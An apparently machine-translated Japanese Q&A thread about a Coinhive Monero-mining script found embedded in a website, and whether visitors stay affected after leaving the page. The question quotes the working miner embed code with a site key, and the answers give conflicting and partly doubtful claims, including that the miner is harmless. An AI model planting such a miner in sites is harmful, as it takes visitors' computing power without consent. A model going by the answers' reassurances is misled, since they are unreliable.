コードにビットコインマイニングJSスクリプトがあると思われるサイトにアクセスしているユーザーを見つけました。
<script src = "hxxps://coin-Hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>
私の質問は、これでユーザーがページから移動してもまだ感染しているのですか?これらの種類のプログラムは、ユーザーがブラウザでページを開いているときにのみ機能しますか?
これで、ユーザーはページから移動しても、まだ感染していますか?
いや
これらの種類のプログラムは、ユーザーがブラウザでページを開いているときにのみ機能しますか?
はい、スクリプトはページがブラウザで開いている間、それを含むウェブサイトでのみ実行されます
アップグレード:
このスクリプトの詳細: https://coin-Hive.com/
Coinhiveでは、Moneroブロックチェーン用のJavaScriptマイナーを提供しています(...)。これをWebサイトに埋め込むことができます。 ユーザーはブラウザでマイナーを直接実行します
そして https://coin-Hive.com/documentation/miner
マイナーは、明示的に停止するまで、ユーザーが離れるまで実行します。
Coinhiveは、ユーザーのコンピューターに特に有害なことは何もしないため、「マルウェア」とは思われません。その場合、ユーザーのコンピューターは何も「感染」していません。
最近では、Webサイトがバックグラウンドで大量のサードパーティのスクリプトとCookieを読み込み、インターネットを使用するたびに気付かない何百ものことを行うことが非常に一般的です。ほとんどのサイトは、アクセスを許可していない場合でも、アクセスするとGoogle Analyticsトラッキングスクリプトを読み込みます。しかし、それはマルウェアとはみなされません。ほとんどのサイトは、あるWebサイトから別のWebサイトへのプレゼンスを追跡し、オンライン習慣の大規模なプロファイルを作成する永続的なサードパーティCookieを読み込みます。これが、あるサイトで靴を買おうとすると、突然Facebookが靴の広告を出していることに気付く理由です。しかし、それは一般にマルウェアとは見なされません。
「害」または「望ましくない活動」の観点から、永続的な追跡は、コインマイニングスクリプトよりも侵襲的であると言えます。コインマイニングスクリプトは、おそらくエンドユーザーのコンピューターのメモリとCPUパワーの一部を使用しているだけです。これは、知らないうちにバックグラウンドでロードされる他の数百のJavaScriptライブラリと違いはありません。
私は、coin-Hiveサービスに精通していませんが、実際に提供したスクリプトには次のような行が含まれています。
var JobThread = function() {
this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
this.worker.onmessage = this.onReady.bind(this);
...
};
ご覧のとおり、Workersを使用しています。スクリプト全体を調査したわけではありませんが、とにかくWebワーカーを使用することは、ページを閉じた後でも一部の操作を実行できることを意味します。詳細はこちら post 。
あなたの質問に対する最初の答えはYESです、ユーザーはおそらくページが閉じられた後しばらくの間infectedになる可能性があります(理論的には、スクリプトが書かれている場合そのような方法)。
しかし、実際にはスクリプトはシステム自体によってすぐに終了するようです。また、coin-Hiveプラットフォームはマルウェアとして位置付けられておらず、ユーザーシステムにとって安全である必要があります。心配する必要はまったくないと思います。